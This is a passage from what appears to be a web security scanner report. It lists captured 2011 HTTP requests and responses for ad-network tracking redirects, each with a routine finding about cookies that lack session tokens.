AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: ach00=903d/120af:fb75/120af; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db41880; expires=Tuesday, 23-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com Date: Sun, 24 Apr 2011 12:33:03 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /match?ex=10&id=CAESELOuaNIo-ALjWWVJnFruZF0&cver=1 HTTP/1.1 Host: cmi.netseer.com Proxy-Connection: keep-alive Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /redirect?ex=10&t=1303614597199 HTTP/1.1 Host: cmi.netseer.com Proxy-Connection: keep-alive Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM#DUE%oZDSFs[C#jT6#4fpHXSw^4MSkbcW^kJHs5vG[(l?%GK2v+wIbLRbZpJZPWPCtBpj(f-%Uqi+C`pFa#KCPN5<uj90t1PzS3+VX?C
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Khs:Q'WOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9`o?G(j89; path=/; expires=Sat, 23-Jul-2011 12:29:23 GMT; domain=.adnxs.com; HttpOnly Date: Sun, 24 Apr 2011 12:29:23 GMT Content-Length: 1505
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Kes:Q'TOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9?.JE/qX3; sess=1; uuid2=2724386019227846218
Response
HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:35 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:35 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:35 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?edtZBb#9$mX.@Q@73P$*uPoKMjCf24wZ'IZLA`.ZC15pJ!+)d.+rHP13k+phc8qcJFwIpC#*Ojk$I#Q9M:ZM-Jm4^*0]M_@X>FG=uNJ?lnOAI]f*J+>[/Bh/ce?bDXi/Su11dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!3=`^=eT1s; path=/; expires=Sat, 23-Jul-2011 12:31:35 GMT; domain=.adnxs.com; HttpOnly Location: http://googleads.g.doubleclick.net/aclk?sa=l&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&sig=AGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A&client=ca-pub-6888065668292638&adurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 Date: Sun, 24 Apr 2011 12:31:35 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /seg?add=93909&t=2 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^hWC]^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM.>wnu4RgaTx8L85eBy@1cmd#TjMSFHhH?CKGG).LqgX<K=+G=8CNE:N(LZ6vB3bbu>7P!U1PE:+FT-:Y@6U@La(Km
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:08:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:08:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 03:08:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM.>wnu4RgaTx8L85eBy@1cmd#TjMSFHhH?CKGG).LqgX<K=+G=8CNE:N(LZ6vB3bbu>7P!U1PE:+FT-:Y@6U@PfkY$; path=/; expires=Sat, 23-Jul-2011 03:08:34 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Sun, 24 Apr 2011 03:08:34 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /image.aspx?sitename=www.securepaynet.net&server=M1PWCORPWEB197&privatelabelid=471557&isc=kro_2011&status=200&rand=0.296151316862624&page=%2fdefault.aspx&referrer=http%3a%2f%2fkroogy.com%2fpub%2fbanner_728_90_random.php&ci=1767&split=30&querystring=isc%3dkro_2011%26ci%3d1767%26prog_id%3dindextonet&prog_id=indextonet HTTP/1.1 Host: img.securepaynet.net Proxy-Connection: keep-alive Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adc471557=US; flag471557=cflag=us; currency471557=potableSourceStr=USD; currencypopin471557=cdisplaypopin=false; SplitValue471557=30; traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: image/gif Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; path=/ Set-Cookie: pagecount=1; domain=.securepaynet.net; path=/ Set-Cookie: fb_pagecount=1; path=/ Set-Cookie: actioncount=; domain=.securepaynet.net; path=/ Set-Cookie: fb_actioncount=; path=/ Set-Cookie: app_pathway=; domain=.securepaynet.net; path=/ Set-Cookie: fb_session=S_TOUCH=04/24/2011 12:42:14&pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b&V_DATE=04/24/2011 05:42:14; path=/ Set-Cookie: isc=kro_2011; domain=.securepaynet.net; path=/ Set-Cookie: visitor=vid=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; expires=Mon, 23-Apr-2012 12:42:14 GMT; path=/ Set-Cookie: traffic=; domain=.securepaynet.net; path=/ X-Powered-By: ASP.NET P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA Date: Sun, 24 Apr 2011 12:42:13 GMT Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
